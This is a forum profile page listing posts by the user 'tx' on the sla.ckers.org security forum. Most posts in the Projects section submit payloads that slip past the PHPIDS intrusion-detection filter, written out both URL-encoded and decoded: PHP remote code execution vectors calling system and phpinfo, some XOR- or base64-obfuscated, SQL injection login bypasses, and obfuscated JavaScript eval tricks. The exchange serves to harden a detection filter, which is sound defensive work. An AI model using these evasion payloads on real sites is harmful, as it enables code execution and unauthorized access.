Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
For any nonsense or banter that doesn't fit anywhere else. LoL! omg! ROFL! 

Pages: 12345...LastNext
Current Page: 1 of 18
Results 1 - 30 of 539
5 years ago
tx
Perhaps I missed something in your post, but it seems that you are just renaming clickjacking.
Forum: News and Links
5 years ago
tx
This was awesome, ascii art spam! Beautiful dreamerawake unto me gg gg gg g gg gg gg ggg ggggg gggggg ggg
Forum: OMG Ponies
5 years ago
tx
@rvdh: lol
Forum: OMG Ponies
5 years ago
tx
Good stuff, I've been enjoying your opera write ups.
Forum: Full Disclosure
5 years ago
tx
S P A M
Forum: Networking
5 years ago
tx
yeah, I've got nothing here...
Forum: Intro
6 years ago
tx
@.mario: link me, I wanna play ! :)
Forum: Projects
6 years ago
tx
@fragge: PHPIDS isn't supposed to filter anything. It only detects and then assigns it a an impact value. Based on that value certain actions can be triggered.
Forum: Projects
6 years ago
tx
thornmaker Wrote: ------------------------------------------------------- > An injection can be massaged to have any [\w\s] to > [^\w\s] ratio needed... I just don't see that > approach ever working. > $xxxxxxx=.1.eval,$xxxxxxx($xxxxxxx('na'+status+('me'),1)) @thornmaker: I have the feeling your probably right. But I wonder, what about looking at unique "words"
Forum: Projects
6 years ago
tx
@thornmaker: nice find!:)
Forum: Projects
6 years ago
tx
I wanted to see how phpids handled some recent stuff from milw0rm, so for fun: RCE http://milw0rm.com/exploits/4851 Caught,score: 19 http://milw0rm.com/exploits/4849 Not caught. vector:?test=@phpinfo();@ LFI http://milw0rm.com/exploits/4876 Caught,score: 15 SQLi http://milw0rm.com/exploits/4867 Caught,score: 32 http://milw0rm.com/exploits/4863 Caught,score: 14 4 out of 5, not bad:)
Forum: Projects
6 years ago
tx
@Gareth,.mario: thx :) I've got another. This is a variation on DoctorDan's vector, shortened to sneak under the centrifuge, which required a few other minor changes: http://demo.phpids.org/?test=%5B%24y%3D%28%27al%27%29%5D%26%5B%24z%3D%24y+%27ert%27%5D%5Ba%3D%281%3F/ev/%3A0%29%5B-1%5D+%24y%5D%28%24z%29%281%29 [$y=('al')]&[$z=$y+'ert']+$y]($z)(1) Only tested in FF2, I don't know if it wor
Forum: Projects
6 years ago
tx
This was super hard to sneak under the centrifuge: http://demo.php-ids.org/?test=%22%3B%20e%7C%24a%3D%26%24_GET%3B%200%7C%24b%3D%21a%20.%24a%5Bb%5D%3B%24a%5Ba%5D%28%60%24b%60%29%3B// ?test="; e|$a=&$_GET; 0|$b=!a .$a;$a(`$b`);// Even shorter: ?test="; e|$a=&$_GET; $a(`$a`);// The code executes $_GET['a'](`$_GET['b']`) as inhttp://localhost/rce.php ?eval="; e|$a=&$_GE
Forum: Projects
6 years ago
tx
Multiple semicolons break the comment regex: http://demo.php-ids.org/?test=%22%3B%3B%20//%0A%20if%20%28%21%28%24_b%5B%5D++%251%29%29%20%24_a%5B0%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%21a.%20%22ls%22%29%3B%20%20// ?test=";; // if (!($_b[]++%1)) $_a[0] = system; $_a[0](!a. "ls"); // Similar variation: http://demo.php-ids.org/?test=%22%3B%3B//%0Aif%281%29%24_a%5B0%5D%3Dsys
Forum: Projects
6 years ago
tx
More php code execution, this time with non-alpha non digit: http://demo.php-ids.org/?test=%22%3B//%0A%20%24%7F%3Dphpinfo%3B%20%24%7F%28%29%3B%20// This uses chr(0x7f):?test=";// $=phpinfo; $(); // php allows chars 0x7f-0xff as valid in variable names, meaning this works: http://demo.php-ids.org/?test=%22%3B//%0A%20%24%7f%c9%e0%3Dphpinfo%3B%20%24%7f%c9%e0%28%29%3B%20// so far 0x7f is t
Forum: Projects
6 years ago
tx
@.mario: nice fix. I've got a slight variant: http://demo.php-ids.org/?test=%22%3B//%0A%20if%20%28%21%28%24_b%5B%5D%2b%2b%251%29%29%20%24_a%5B0%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%20// ";// if (!($_b[]++%1)) $_a[0] = system; $_a[0]( "ls"); // EDIT: encoded '+'
Forum: Projects
6 years ago
tx
More PHP RCE: http://demo.php-ids.org/?test=%22%3B%7Bif%20%28true%29%20%24_a%5B%5D%20%20%3D%20system%3B%0A%24_a%5B0%5D%28%20%22ls%22%29%3B%20%7D%20// ";{if (true) $_a[] = system; $_a[0]( "ls"); } // ";{if (1) $_a[] = system; $_a[0]( "ls"); } // Other ways of getting 'true' http://demo.php-ids.org/?test=%22%3B%7Bif%20%28%21%28%24_b%5B%5D%2b%2b%251%29%29%20%24_a
Forum: Projects
6 years ago
tx
variations on thornmaker's alerts from the other day http://demo.phpids.org/?test=x%3D%21/x/%3F/x/-%2bd%3Aalert%0Ax%280%29 : ?test=x=!/x/?/x/-+d:alert x(0)?test=x=!#0={}?/x/-+x:alert x(0)?test=x=!disableExternalCapture?/x/-+text_goes_here:alert x(0) They can all be extended pretty much the same way for DoctorDan's alerts http://demo.phpids.org/?test=x%3D%21/%5C%5C/%3F%7B%7D%2B1-1%3Aalert%0ax%2
Forum: Projects
6 years ago
tx
I'm still working on my regex prowess but I believe that is +{any character except 's' or ':'}:{any character except 's' or '='}= Example: +a:b= or to give a better example +$b:a $b= and +$b:a $a= in a=/x/ $b=!!1e1?'ash':a $b=!!1e1?'ion.h'+$b:a $b=!!1e1?'locat'+$b:a $a=!1e1?!1e1:eval a.a=$a $b=a.a($b) $b=a.a($b) @.mario: why [^s], btw?
Forum: Projects
7 years ago
tx
Hey .mario, Auth Bypass MATCH...AGAINST Variations http://demo.php-ids.org/?test=%27%20or%20MATCH%20username%20AGAINST%20%28%27%2badmin%20-a%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a : ?test=' or MATCH username AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a ?test=' or MATCH username,password AGAINST ('+admin -a' IN BOOLEAN MODE); -- -a ?test=' or MATCH username AGAINST ('admin' IN BOOLEAN MODE)
Forum: Projects
7 years ago
tx
.mario, This is still undetected: http://demo.php-ids.org/?test=%27%20or%20MATCH%20%28username%29%20AGAINST%20%28%27+admin%20-asds%27%20IN%20BOOLEAN%20MODE%29%3B%20--%20-a ?test=' or MATCH (username) AGAINST ('+admin -asds' IN BOOLEAN MODE); -- -a
Forum: Projects
7 years ago
tx
@.mario: That's catching just about everything now. Just one more: http://demo.php-ids.org/?test=%22%3B//%0A%7B%20if%20%28%21%22%7D%22%29%7B%0A%3B%0A%7Delse%7B%20%24_a%20%20%3D%20%21%22%29%22%20.%20str_replace%28%22%21%22%2C%22%22%2C%22s%21y%21s%21t%21e%21m%21%22%29%3B%20//%0A%24_a%28%20%22dir%22%29%3B%20%7D%7D%20// ?test=";// { if (!"}"){ ; }else{ $_a = !")" . str_r
Forum: Projects
7 years ago
tx
@.mario: Great fixes again, you're making this nice and fun. I can only tip my hat to your regex prowess... it's a lot easier for me to get around these rules than it would be for me to write them! *tips hat* Anyway, the (?:<[?%](?:php)?.*(?:[?%]>)?)|(?:;\s*\$\w+\s*=)|(?:\$\w+\s*=(?:(?:\s*\$?\w+\s*[(;])|\s*".*")) rule can be circumvented by prepending a null value to the string/
Forum: Projects
7 years ago
tx
blah, blah, blah another variation. I was thinking about sirdarckcat and eval'ing document.location. pretty much the concept that there is certain data that isn't likely to be checked (either due to possibility or context), ie. in the case of javascript the post hash characters, and in this case, certain variables. This is related to the Register Globals=On vector, which has damn near infinite pos
Forum: Projects
7 years ago
tx
@.mario: The filters are getting really challenging now. Here's some variations on a PHPi that Reiners posted yesterday: http://demo.php-ids.org/?test=%22%3B%7B%20if%20%28true%29%20%24_a%20%20%3D%20%22%22%20.%20strtolower%28%22pass%22%29%3B%0Aif%20%20%20%281%29%20%24_a.%3D%20%22%22%20.%20strtolower%28%22thru%22%29%3B%20%0A%24_a%28%20%22dir%22%29%3B%20%7D%20// ?test=";{ if (true) $_a = &
Forum: Projects
7 years ago
tx
Variation, XOR'd payload :) http://demo.php-ids.org/?test=%22%3B%20%0Adefine%20%28%20_a%2C%20%220008avwga000934mm40re8n5n3aahgqvaga0a303%22%29%20%3B%0Aif%20%20%28%20%210%29%20%24c%20%3D%20USXWATKXACICMVYEIkw71cLTLnHZHXOTAYADOCXC%20%5E%20_a%3B%0Aif%20%20%28%20%210%29%20system%28%24c%29%20%3B// ?test="; define ( _a, "0008avwga000934mm40re8n5n3aahgqvaga0a303") ; if ( !0) $c = USXW
Forum: Projects
7 years ago
tx
Another remote command/code execution in php: http://demo.php-ids.org/?test=%22%20%3B%20%20%0Adefine%20%28%20_a%20%2C%20%27ls%20-la%27%29%3B%0Aif%20%20%28%210%29%20%20%20%20%24_a%3D%22%22._a%3B%0Aif%20%28%210%29%20print%28%60%24_a%60%29%3B%0A// ?test=" ; define ( _a , 'ls -la'); if (!0) $_a=""._a; if (!0) print(`$_a`); // With base64 payload http://demo.php-ids.org/?
Forum: Projects
7 years ago
tx
@.mario: Excellent and timely fixes, once again. :) @thornmaker: thx! Function call (phpinfo) can be bypassed as follows: http://demo.php-ids.org/?test=%22%3B%20define%28_a%2C%27phpinfo%27%29%3B%20if%20%20%281%29%20%24_a%3D_a%3B%20%24_a%281%29%3B// ?test="; define(_a,'phpinfo'); if (1) $_a=_a; $_a(1);//
Forum: Projects
7 years ago
tx
I figure I've got to lay off the SQL for a bit, especially if we're gonna have a contest, so: Remote code injection (php5): http://demo.php-ids.org/?test=%22%3B%20%24_a%3D%28%21%20%27a%27%29%20.%20%22php%22%3B%20%24_a.%3D%28%21%20%27a%27%29%20.%20%22info%22%3B%0A%24_a%281%29%3B%20%24b%3D%22 ?test="; $_a=(! 'a') . "php"; $_a.=(! 'a') . "info"; $_a(1); $b=" EDIT:
Forum: Projects
7 years ago
tx
I just thought of these variants on the way to the store (inspired by Reiners recent vectors): http://demo.php-ids.org/?test=%27%20COALESCE%28%27admin%27%29%20and%20@@version%20NOT%20BETWEEN%20%211%20div%201%20%27 ?test='+COALESCE('admin') and @@version NOT BETWEEN !1 div 1+' tons of options here: ?test='+COALESCE('admin') and @@version NOT BETWEEN !@@version div @@version+' For fun: ?test='+CO
Forum: Projects
Pages: 12345...LastNext
Current Page: 1 of 18